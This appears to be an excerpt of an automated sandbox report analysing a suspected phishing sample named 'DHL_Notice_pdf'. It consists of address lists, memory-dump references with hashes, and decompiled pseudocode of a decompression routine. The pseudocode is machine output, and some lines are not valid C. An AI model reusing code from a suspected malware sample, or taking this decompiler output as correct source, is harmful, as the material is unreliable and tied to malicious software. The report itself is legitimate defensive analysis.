                                                            0x00406e35
                                                            0x00406e35
                                                            0x00406e39
                                                            0x00406e3c
                                                            0x00406e3f
                                                            0x00406e42
                                                            0x00406e45
                                                            0x00406e46
                                                            0x00406e49
                                                            0x00406e4b
                                                            0x00406e51
                                                            0x00406e54
                                                            0x00406e57
                                                            0x00406e5a
                                                            0x00406e5d
                                                            0x00406e60
                                                            0x00406e63
                                                            0x00406e7f
                                                            0x00406e82
                                                            0x00406e85
                                                            0x00406e88
                                                            0x00406e8f
                                                            0x00406e93
                                                            0x00406e95
                                                            0x00406e99
                                                            0x00406e65
                                                            0x00406e65
                                                            0x00406e69
                                                            0x00406e71
                                                            0x00406e76
                                                            0x00406e78
                                                            0x00406e7a
                                                            0x00406e7a
                                                            0x00406e9c
                                                            0x00406ea3
                                                            0x00406ea6
                                                            0x00000000
                                                            0x00406eac
                                                            0x00000000
                                                            0x00406eac
                                                            0x00000000
                                                            0x00406eb1
                                                            0x00406eb1
                                                            0x00406eb5
                                                            0x00407575
                                                            0x00000000
                                                            0x00407575
                                                            0x00406ebb
                                                            0x00406ebe
                                                            0x00406ec1
                                                            0x00406ec5
                                                            0x00406ec8
                                                            0x00406ece
                                                            0x00406ed0
                                                            0x00406ed0
                                                            0x00406ed0
                                                            0x00406ed3
                                                            0x00406ed6
                                                            0x00406ed6
                                                            0x00406ed6
                                                            0x00406edc
                                                            0x00000000
                                                            0x00000000
                                                            0x00406ede
                                                            0x00406ee1
                                                            0x00406ee4
                                                            0x00406ee7
                                                            0x00406eea
                                                            0x00406eed
                                                            0x00406ef0
                                                            0x00406ef3
                                                            0x00406ef6
                                                            0x00406ef9
                                                            0x00406efc
                                                            0x00406f14
                                                            0x00406f17
                                                            0x00406f1a
                                                            0x00406f1d
                                                            0x00406f1d
                                                            0x00406f20
                                                            0x00406f24
                                                            0x00406f26
                                                            0x00406efe
                                                            0x00406efe
                                                            0x00406f06
                                                            0x00406f0b
                                                            0x00406f0d
                                                            0x00406f0f
                                                            0x00406f0f
                                                            0x00406f29
                                                            0x00406f30
                                                            0x00406f33
                                                            0x00000000
                                                            0x00406f35
                                                            0x00000000
                                                            0x00406f35
                                                            0x00406f33
                                                            0x00406f3a
                                                            0x00406f3a
                                                            0x00406f3a
                                                            0x00406f3a
                                                            0x00000000
                                                            0x00000000
                                                            0x00406f75
                                                            0x00406f75
                                                            0x00406f79
                                                            0x00407581
                                                            0x00000000
                                                            0x00407581
                                                            0x00406f7f
                                                            0x00406f82
                                                            0x00406f85
                                                            0x00406f89
                                                            0x00406f8c
                                                            0x00406f92
                                                            0x00406f94
                                                            0x00406f94
                                                            0x00406f94
                                                            0x00406f97
                                                            0x00406f9a
                                                            0x00406f9a
                                                            0x00406fa0
                                                            0x00406f3e
                                                            0x00406f3e
                                                            0x00406f41
                                                            0x00000000
                                                            0x00406f41
                                                            0x00406fa2
                                                            0x00406fa2
                                                            0x00406fa5
                                                            0x00406fa8
                                                            0x00406fab
                                                            0x00406fae
                                                            0x00406fb1
                                                            0x00406fb4
                                                            0x00406fb7
                                                            0x00406fba
                                                            0x00406fbd
                                                            0x00406fc0
                                                            0x00406fd8
                                                            0x00406fdb
                                                            0x00406fde
                                                            0x00406fe1
                                                            0x00406fe1
                                                            0x00406fe4
                                                            0x00406fe8
                                                            0x00406fea
                                                            0x00406fc2
                                                            0x00406fc2
                                                            0x00406fca
                                                            0x00406fcf
                                                            0x00406fd1
                                                            0x00406fd3
                                                            0x00406fd3
                                                            0x00406fed
                                                            0x00406ff4
                                                            0x00406ff7
                                                            0x00000000
                                                            0x00406ff9
                                                            0x00000000
                                                            0x00406ff9
                                                            0x00000000
                                                            0x00407286
                                                            0x00407286
                                                            0x0040728a
                                                            0x004075b1
                                                            0x00000000
                                                            0x004075b1
                                                            0x00407290
                                                            0x00407293
                                                            0x00407296
                                                            0x0040729a
                                                            0x0040729d
                                                            0x004072a3
                                                            0x004072a5
                                                            0x004072a5
                                                            0x004072a5
                                                            0x004072a8
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00407395
                                                            0x00407399
                                                            0x004073bb
                                                            0x004073be
                                                            0x004073c8
                                                            0x004073cb
                                                            0x004073cb
                                                            0x004073cb
                                                            0x00000000
                                                            0x004073cb
                                                            0x004073cb
                                                            0x0040739b
                                                            0x0040739e
                                                            0x004073a2
                                                            0x004073a5
                                                            0x004073a5
                                                            0x004073a8
                                                            0x00000000
                                                            0x00000000
                                                            0x00407452
                                                            0x00407456
                                                            0x00407474
                                                            0x00407474
                                                            0x00407474
                                                            0x0040747b
                                                            0x00407482
                                                            0x00407489
                                                            0x00407489
                                                            0x00000000
                                                            0x00407489
                                                            0x00407458
                                                            0x0040745b
                                                            0x0040745e
                                                            0x00407461
                                                            0x00407468
                                                            0x004073ac
                                                            0x004073ac
                                                            0x004073af
                                                            0x00000000
                                                            0x00000000
                                                            0x00407543
                                                            0x00407546
                                                            0x00407447
                                                            0x00000000
                                                            0x00000000
                                                            0x0040717d
                                                            0x0040717f
                                                            0x00407186
                                                            0x00407187
                                                            0x00407189
                                                            0x0040718c
                                                            0x00000000
                                                            0x00000000
                                                            0x00407194
                                                            0x00407197
                                                            0x0040719a
                                                            0x0040719c
                                                            0x0040719e
                                                            0x0040719e
                                                            0x0040719f
                                                            0x004071a2
                                                            0x004071a9
                                                            0x004071ac
                                                            0x004071ba
                                                            0x00000000
                                                            0x00000000
                                                            0x00407490
                                                            0x00407490
                                                            0x00407493
                                                            0x0040749a
                                                            0x00000000
                                                            0x00000000
                                                            0x0040749f
                                                            0x0040749f
                                                            0x004074a3
                                                            0x004075db
                                                            0x00000000
                                                            0x004075db
                                                            0x004074a9
                                                            0x004074ac
                                                            0x004074af
                                                            0x004074b3
                                                            0x004074b6
                                                            0x004074bc
                                                            0x004074be
                                                            0x004074be
                                                            0x004074be
                                                            0x004074c1
                                                            0x004074c4
                                                            0x004074c4
                                                            0x004074c4
                                                            0x004074c4
                                                            0x004074c7
                                                            0x004074c7
                                                            0x004074cb
                                                            0x0040752b
                                                            0x0040752e
                                                            0x00407533
                                                            0x00407534
                                                            0x00407536
                                                            0x00407538
                                                            0x0040753b
                                                            0x00407447
                                                            0x00407447
                                                            0x00000000
                                                            0x0040744d
                                                            0x00407447
                                                            0x004074cd
                                                            0x004074d3
                                                            0x004074d6
                                                            0x004074d9
                                                            0x004074dc
                                                            0x004074df
                                                            0x004074e2
                                                            0x004074e5
                                                            0x004074e8
                                                            0x004074eb
                                                            0x004074ee
                                                            0x00407507
                                                            0x0040750a
                                                            0x0040750d
                                                            0x00407510
                                                            0x00407514
                                                            0x00407516
                                                            0x00407516
                                                            0x00407517
                                                            0x0040751a
                                                            0x004074f0
                                                            0x004074f0
                                                            0x004074f8
                                                            0x004074fd
                                                            0x004074ff
                                                            0x00407502
                                                            0x00407502
                                                            0x0040751d
                                                            0x00407524
                                                            0x00000000
                                                            0x00407526
                                                            0x00000000
                                                            0x00407526
                                                            0x00000000
                                                            0x004071c2
                                                            0x004071c5
                                                            0x004071fb
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732e
                                                            0x0040732e
                                                            0x00407331
                                                            0x00407333
                                                            0x004075bd
                                                            0x00000000
                                                            0x004075bd
                                                            0x00407339
                                                            0x0040733c
                                                            0x00000000
                                                            0x00000000
                                                            0x00407342
                                                            0x00407346
                                                            0x00407349
                                                            0x00407349
                                                            0x00407349
                                                            0x00000000
                                                            0x00407349
                                                            0x004071c7
                                                            0x004071c9
                                                            0x004071cb
                                                            0x004071cd
                                                            0x004071d0
                                                            0x004071d1
                                                            0x004071d3
                                                            0x004071d5
                                                            0x004071d8
                                                            0x004071db
                                                            0x004071f1
                                                            0x004071f6
                                                            0x0040722e
                                                            0x0040722e
                                                            0x00407232
                                                            0x0040725e
                                                            0x00407260
                                                            0x00407267
                                                            0x0040726a
                                                            0x0040726d
                                                            0x0040726d
                                                            0x00407272
                                                            0x00407272
                                                            0x00407274
                                                            0x00407277
                                                            0x0040727e
                                                            0x00407281
                                                            0x004072ae
                                                            0x004072ae
                                                            0x004072b1
                                                            0x004072b4
                                                            0x00407328
                                                            0x00407328
                                                            0x00407328
                                                            0x00000000
                                                            0x00407328
                                                            0x004072b6
                                                            0x004072bc
                                                            0x004072bf
                                                            0x004072c2
                                                            0x004072c5
                                                            0x004072c8
                                                            0x004072cb
                                                            0x004072ce
                                                            0x004072d1
                                                            0x004072d4
                                                            0x004072d7
                                                            0x004072f0
                                                            0x004072f2
                                                            0x004072f5
                                                            0x004072f6
                                                            0x004072f9
                                                            0x004072fb
                                                            0x004072fe
                                                            0x00407300
                                                            0x00407302
                                                            0x00407305
                                                            0x00407307
                                                            0x0040730a
                                                            0x0040730e
                                                            0x00407310
                                                            0x00407310
                                                            0x00407311
                                                            0x00407314
                                                            0x00407317
                                                            0x004072d9
                                                            0x004072d9
                                                            0x004072e1
                                                            0x004072e6
                                                            0x004072e8
                                                            0x004072eb
                                                            0x004072eb
                                                            0x0040731a
                                                            0x00407321
                                                            0x004072ab
                                                            0x004072ab
                                                            0x004072ab
                                                            0x004072ab
                                                            0x00000000
                                                            0x00407323
                                                            0x00000000
                                                            0x00407323
                                                            0x00407321
                                                            0x00407234
                                                            0x00407237
                                                            0x00407239
                                                            0x0040723c
                                                            0x0040723f
                                                            0x00407242
                                                            0x00407244
                                                            0x00407247
                                                            0x0040724a
                                                            0x0040724a
                                                            0x0040724d
                                                            0x0040724d
                                                            0x00407250
                                                            0x00407257
                                                            0x0040722b
                                                            0x0040722b
                                                            0x0040722b
                                                            0x0040722b
                                                            0x00000000
                                                            0x00407259
                                                            0x00000000
                                                            0x00407259
                                                            0x00407257
                                                            0x004071dd
                                                            0x004071e0
                                                            0x004071e2
                                                            0x004071e5
                                                            0x00000000
                                                            0x00000000
                                                            0x00406f44
                                                            0x00406f44
                                                            0x00406f48
                                                            0x0040758d
                                                            0x00000000
                                                            0x0040758d
                                                            0x00406f4e
                                                            0x00406f51
                                                            0x00406f54
                                                            0x00406f57
                                                            0x00406f5a
                                                            0x00406f5d
                                                            0x00406f60
                                                            0x00406f62
                                                            0x00406f65
                                                            0x00406f68
                                                            0x00406f6b
                                                            0x00406f6d
                                                            0x00406f6d
                                                            0x00406f6d
                                                            0x00000000
                                                            0x00000000
                                                            0x004070cf
                                                            0x004070cf
                                                            0x004070d3
                                                            0x00407599
                                                            0x00000000
                                                            0x00407599
                                                            0x004070d9
                                                            0x004070dc
                                                            0x004070df
                                                            0x004070e2
                                                            0x004070e4
                                                            0x004070e4
                                                            0x004070e4
                                                            0x004070e7
                                                            0x004070ea
                                                            0x004070ed
                                                            0x004070f0
                                                            0x004070f3
                                                            0x004070f6
                                                            0x004070f7
                                                            0x004070f9
                                                            0x004070f9
                                                            0x004070f9
                                                            0x004070fc
                                                            0x004070ff
                                                            0x00407102
                                                            0x00407105
                                                            0x00407105
                                                            0x00407105
                                                            0x00407108
                                                            0x0040710a
                                                            0x0040710a
                                                            0x00000000
                                                            0x00000000
                                                            0x0040734c
                                                            0x0040734c
                                                            0x0040734c
                                                            0x00407350
                                                            0x00000000
                                                            0x00000000
                                                            0x00407356
                                                            0x00407359
                                                            0x0040735c
                                                            0x0040735f
                                                            0x00407361
                                                            0x00407361
                                                            0x00407361
                                                            0x00407364
                                                            0x00407367
                                                            0x0040736a
                                                            0x0040736d
                                                            0x00407370
                                                            0x00407373
                                                            0x00407374
                                                            0x00407376
                                                            0x00407376
                                                            0x00407376
                                                            0x00407379
                                                            0x0040737c
                                                            0x0040737f
                                                            0x00407382
                                                            0x00407385
                                                            0x00407389
                                                            0x0040738b
                                                            0x0040738e
                                                            0x00000000
                                                            0x00407390
                                                            0x0040710d
                                                            0x0040710d
                                                            0x00000000
                                                            0x0040710d
                                                            0x0040738e
                                                            0x004075c3
                                                            0x00000000
                                                            0x00000000
                                                            0x00406bf2
                                                            0x004075fa
                                                            0x004075fa
                                                            0x00000000
                                                            0x004075fa
                                                            0x00407447
                                                            0x004073ce
                                                            0x004073cb
                                                            0x00000000
                                                            0x00407120

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                            • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                            • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                            • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00407068 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 98%
                                                            			E00407068() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
